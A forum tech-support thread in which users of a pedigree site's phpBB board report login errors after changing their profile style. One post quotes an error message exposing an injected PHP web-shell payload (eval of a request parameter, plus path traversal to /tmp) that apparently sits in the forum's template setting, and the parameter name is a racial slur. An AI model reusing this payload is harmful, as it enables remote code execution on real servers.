General discussions about the technical aspects of the site -- generating reports, reading reports, uploading information, forum techniques, etc.

Moderators: Roguelet, WaveMaster, Lucy

NYBreeder2
Newborn

Postby NYBreeder2 » Thu Nov 17, 2005 12:41 pm

I had to make a new ID because I can not log in with my old one. I get an error page every time I try that has some message about debugging. I have even tried from 3 other computers and no go. Finally I was able to make a new ID. Has anyone else had this issue?

Retrospective
Newborn

Postby Retrospective » Sat Feb 18, 2006 6:12 pm

Think we might be having the same problem.
I was in playing with my profile and changed the color from sub-silver to the black option. When I hit submit and then went to go back to the 'Index' I got the error message come up, and couldn't access the forum again until I cleared cookies/history/files, etc. As soon as I logged in with my normal name I got it again.
This is what comes up on my screen:

phpBB : Critical Error

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 335
File : /www/share/PedigreeQuery/web_pages/forum/includes/functions.php

I had to create a new account just to get back on the board (ok...so I just added an 'e' to my name but it's still new).
Can someone go into my account (Retrospectiv) and change the board color back...that seems to be what caused the error for me atleast.
Heeeeellllllllppppppppppppp :wink:
~If you must choose between two evils, pick the one you've never tried before~

Roguelet

Postby Roguelet » Sun Feb 19, 2006 11:58 am

Retrospective wrote:Can someone go into my account (Retrospectiv) and change the board color back...that seems to be what caused the error for me atleast.
Heeeeellllllllppppppppppppp :wink:

Done.
"Don't be a boorish buffoon" -Hokies Respect 'Jerk Alert'

Retrospectiv
Maiden Special Weight

Postby Retrospectiv » Mon Feb 20, 2006 6:34 am

Ahhh...much better. TY! :)

NYB2....were you playing with your profile when you had the problem or was it something else? (Psstt...don't choose the black option! :wink: )